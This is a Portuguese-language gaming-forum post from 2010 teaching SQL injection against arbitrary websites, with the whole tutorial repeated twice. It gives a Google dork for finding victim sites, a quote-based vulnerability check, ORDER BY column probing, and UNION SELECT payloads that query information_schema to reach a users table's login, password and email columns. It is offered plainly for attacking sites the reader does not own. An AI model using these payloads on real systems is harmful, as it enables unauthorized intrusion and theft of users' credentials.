hackeando site por sql inject
Forum Games :: Hackers :: Hackers
Página 1 de 1
hackeando site por sql inject
Hubble Qua Nov 10, 2010 1:32 pm
Eai gente blz?? talvez alguns não entendam esse tuto por ser muito avançado
SQL Inject avançado explorando vulnerabilidades.
1º Passo: Encontrar um site vulnerável.
Para isso vamos usar a seguinte string no google inurl:noticias.php?id=.
Aparecera uma lista de sites,escolha um e verifique se o site esta vulnerável a SQL INJECTION.
Suponhamos que voce escolheu o site:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Para verficar se ele esta vulnerável é bem simples basta adicionar uma ASPAS no final do numero de ID.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Se aparecer uma mensagem de erro SQL o site esta vulnerável,se o site carregar normalmente ele não esta,e so partir para outro e tentar.
2º Passo: Aplicando os comandos SQL no site(UNIR AS TABELAS DO SITE).
Vamos procurar quantas tabelas o site possui com o comando ORDER BY ou GROUP BY ex:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 1
Se o site carregar normalmente prossiga.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 2
Se novamente carregar sem nenhum erro prossiga.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 3
Se novamente carregar sem nenhum erro prossiga
-
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 4
Suponhamos que no order by 4 ele aparece uma mensagem de erro SQL,ok com isso verificamos que o site possui 3 tabelas.
Agora vamos unir as tabelas para saber em qual esta a informação desejada com o comando abaixo:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] uni-on all select 1,2,3--
Após a execução do comando suponhamos que a tabela foi a número 2
3º Passo: Listando as tabelas e suas respectivas colunas.
Depois de ter unido as tabelas vamos lista-las com o comando:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] uni-on all select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()--
Suponhamos que apareçam as seguintes tabelas:
Usuarios,Links,News.
Nosso interesse e a tabela usuarios,agora vamos listar as colunas da tabela USUARIO com o comando:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='Usuarios'--
Após isso teremos as colunas:
Login,senha,email.
SQL Inject avançado explorando vulnerabilidades.
1º Passo: Encontrar um site vulnerável.
Para isso vamos usar a seguinte string no google inurl:noticias.php?id=.
Aparecera uma lista de sites,escolha um e verifique se o site esta vulnerável a SQL INJECTION.
Suponhamos que voce escolheu o site:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Para verficar se ele esta vulnerável é bem simples basta adicionar uma ASPAS no final do numero de ID.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Se aparecer uma mensagem de erro SQL o site esta vulnerável,se o site carregar normalmente ele não esta,e so partir para outro e tentar.
2º Passo: Aplicando os comandos SQL no site(UNIR AS TABELAS DO SITE).
Vamos procurar quantas tabelas o site possui com o comando ORDER BY ou GROUP BY ex:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 1
Se o site carregar normalmente prossiga.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 2
Se novamente carregar sem nenhum erro prossiga.
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 3
Se novamente carregar sem nenhum erro prossiga
-
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] order by 4
Suponhamos que no order by 4 ele aparece uma mensagem de erro SQL,ok com isso verificamos que o site possui 3 tabelas.
Agora vamos unir as tabelas para saber em qual esta a informação desejada com o comando abaixo:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] uni-on all select 1,2,3--
Após a execução do comando suponhamos que a tabela foi a número 2
3º Passo: Listando as tabelas e suas respectivas colunas.
Depois de ter unido as tabelas vamos lista-las com o comando:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] uni-on all select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()--
Suponhamos que apareçam as seguintes tabelas:
Usuarios,Links,News.
Nosso interesse e a tabela usuarios,agora vamos listar as colunas da tabela USUARIO com o comando:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='Usuarios'--
Após isso teremos as colunas:
Login,senha,email.
Hubble- Admin
- Mensagens : 3
Data de inscrição : 05/11/2010
Localização : Deserto da lamentação - Cabal
Ficha do personagem
Nivel:
(90/90)
Forum Games :: Hackers :: Hackers
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos